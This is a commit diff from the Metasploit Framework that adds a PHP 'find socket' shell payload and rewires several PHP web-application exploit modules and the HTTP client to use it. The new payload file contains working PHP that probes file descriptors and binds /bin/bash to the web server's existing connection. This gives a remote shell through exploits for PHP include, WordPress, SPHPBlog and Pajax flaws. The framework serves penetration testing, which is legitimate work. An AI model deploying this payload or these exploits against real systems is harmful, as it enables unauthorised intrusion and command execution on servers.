initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs.
git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ddc47955f2
commit
36a06e7576
|
@ -36,6 +36,10 @@ class CommandShell
|
|||
"Command shell"
|
||||
end
|
||||
|
||||
def run_cmd(cmd)
|
||||
write_shell(cmd)
|
||||
return rstream.get
|
||||
end
|
||||
#
|
||||
# Calls the class method.
|
||||
#
|
||||
|
@ -54,7 +58,12 @@ class CommandShell
|
|||
# Read from the command shell.
|
||||
#
|
||||
def read_shell(length = nil)
|
||||
return rstream.read(length)
|
||||
if length.nil?
|
||||
rv = rstream.get
|
||||
else
|
||||
rv = rstream.read(length)
|
||||
end
|
||||
return rv
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -110,13 +110,15 @@ module Exploit::Remote::HttpClient
|
|||
)
|
||||
|
||||
# If this connection is global, persist it
|
||||
if (opts['global'])
|
||||
# No reason for the socket not to be global and it allows findsock to
|
||||
# work.
|
||||
#if (opts['global'])
|
||||
if (self.client)
|
||||
disconnect
|
||||
end
|
||||
|
||||
self.client = nclient
|
||||
end
|
||||
#end
|
||||
|
||||
return nclient
|
||||
end
|
||||
|
|
|
@ -123,6 +123,8 @@ protected
|
|||
Rex::ThreadSafe.sleep(1.5)
|
||||
end
|
||||
|
||||
# Make sure the read buffer is empty before we test for a shell
|
||||
sock.get_once(-1,1)
|
||||
# Check to see if the shell exists
|
||||
sock.put("\necho #{ebuf}\n")
|
||||
|
||||
|
|
|
@ -24,7 +24,8 @@ class Msf::Module::Author
|
|||
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
|
||||
'patrick' => 'patrick' + 0x40.chr + 'aushack.com',
|
||||
'ramon' => 'ramon' + 0x40.chr + 'risesecurity.org',
|
||||
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org'
|
||||
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
|
||||
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com'
|
||||
}
|
||||
|
||||
#
|
||||
|
|
|
@ -95,7 +95,14 @@ protected
|
|||
# Check to see if the user wants to abort.
|
||||
#
|
||||
def _interrupt
|
||||
begin
|
||||
user_want_abort?
|
||||
rescue Interrupt
|
||||
# The user hit ctrl-c while we were handling a ctrl-c, send a
|
||||
# literal ctrl-c to the shell. XXX Doesn't actually work.
|
||||
#$stdout.puts("\n[*] interrupted interrupt, sending literal ctrl-c\n")
|
||||
#$stdout.puts(run_cmd("\x03"))
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -54,6 +54,7 @@ module Stream
|
|||
# This method reads data of the supplied length from the stream.
|
||||
#
|
||||
def read(length = nil, opts = {})
|
||||
# XXX handle length being nil
|
||||
begin
|
||||
fd.sysread(length)
|
||||
rescue IOError
|
||||
|
|
|
@ -315,7 +315,7 @@ class Client
|
|||
resp.max_data = config['read_max_data']
|
||||
|
||||
# Tell the remote side if we aren't pipelining
|
||||
conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
|
||||
#conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
|
||||
|
||||
# Wait at most t seconds for the full response to be read in. We only
|
||||
# do this if t was specified as a negative value indicating an infinite
|
||||
|
@ -369,15 +369,17 @@ class Client
|
|||
end
|
||||
rescue EOFError
|
||||
return nil
|
||||
rescue ::TimeoutError, ::Timeout::Error
|
||||
#$stdout.puts("timeout\n")
|
||||
end
|
||||
} if (t)
|
||||
|
||||
# Close our side if we aren't pipelining
|
||||
close if (!pipelining?)
|
||||
#close if (!pipelining?)
|
||||
|
||||
# if the server said stop pipelining, we listen...
|
||||
if resp['Connection'] == 'close'
|
||||
close
|
||||
#close
|
||||
end
|
||||
|
||||
# XXX - How should we handle this?
|
||||
|
|
|
@ -43,6 +43,10 @@ class Exploits::Unix::Webapp::Pajax_Execute < Msf::Exploit::Remote
|
|||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
'Space' => 4000,
|
||||
},
|
||||
'Platform' => 'php',
|
||||
|
|
|
@ -26,7 +26,7 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
Exploits things like <?php include($_GET['path']); ?>
|
||||
},
|
||||
'Author' => [ 'hdm' , 'egypt <egypt@nmt.edu>'],
|
||||
'Author' => [ 'hdm' , 'egypt' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
@ -37,6 +37,13 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
|
|||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
# By adding {'global' => true} to the connect
|
||||
# options we get find shell compatibility for free
|
||||
# in php exploits.
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
'Space' => 32768,
|
||||
},
|
||||
'Platform' => 'php',
|
||||
|
@ -57,8 +64,9 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
|
|||
timeout = 0.01
|
||||
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))
|
||||
print_status("Trying uri #{uri}")
|
||||
response = send_request_raw({ 'uri' => uri },timeout)
|
||||
response = send_request_raw({ 'global' => true, 'uri' => uri },timeout)
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -42,6 +42,10 @@ class Exploits::Unix::Webapp::Wordpress_LastPost_Execution < Msf::Exploit::Remot
|
|||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
'Space' => 512,
|
||||
},
|
||||
'Platform' => 'php',
|
||||
|
|
|
@ -45,6 +45,10 @@ class Exploits::Unix::Webapp::SPHPBlog_File_Upload < Msf::Exploit::Remote
|
|||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
'Space' => 1024,
|
||||
},
|
||||
'Platform' => 'php',
|
||||
|
|
|
@ -0,0 +1,93 @@
|
|||
##
|
||||
# $Id: bind_php.rb 5546 2008-07-01 01:44:56Z egypt $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/php'
|
||||
require 'msf/core/handler/bind_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/core/handler/find_shell'
|
||||
|
||||
module Msf
|
||||
module Payloads
|
||||
module Singles
|
||||
module Php
|
||||
|
||||
module ShellFindsock
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Payload::Php
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'PHP Command Shell, Find Port',
|
||||
'Version' => '$Revision: 5546 $',
|
||||
'Description' => %Q{
|
||||
Spawn a shell on the established connection to
|
||||
the webserver. Only tested on Apache but it
|
||||
might work on other web servers that leak file
|
||||
descriptors to child processes.
|
||||
},
|
||||
'Author' => [ 'egypt <egypt@metasploit.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => 'php',
|
||||
'Handler' => Msf::Handler::FindShell,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Arch' => ARCH_PHP
|
||||
))
|
||||
end
|
||||
|
||||
def php_findsock
|
||||
|
||||
#cmd = Rex::Text.encode_base64(datastore['CMD'])
|
||||
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
shell = <<END_OF_PHP_CODE
|
||||
error_reporting(E_ALL);
|
||||
print("<html><body>");
|
||||
flush();
|
||||
|
||||
error_log("Looking for file descriptor");
|
||||
$fd = 13;
|
||||
for ($i = 3; $i < 50; $i++) {
|
||||
$foo = system("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
|
||||
if ($foo != $i) {
|
||||
$fd = $i - 1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
error_log("Found it ($fd)");
|
||||
print("</body></html>\n\n");
|
||||
flush();
|
||||
|
||||
$c = "/bin/bash <&$fd >&$fd 2>&$fd";
|
||||
system($c);
|
||||
|
||||
END_OF_PHP_CODE
|
||||
|
||||
#function mysystem(){
|
||||
# #{php_preamble({:disabled_varname => dis})}
|
||||
# #{php_system_block({:cmd_varname=>'$c', :disabled_varname => dis, :output_varname => '$out'})}
|
||||
# return $out;
|
||||
#}
|
||||
|
||||
return shell
|
||||
end
|
||||
|
||||
#
|
||||
# Constructs the payload
|
||||
#
|
||||
def generate
|
||||
return php_findsock
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end end end end
|
Loading…
Reference in New Issue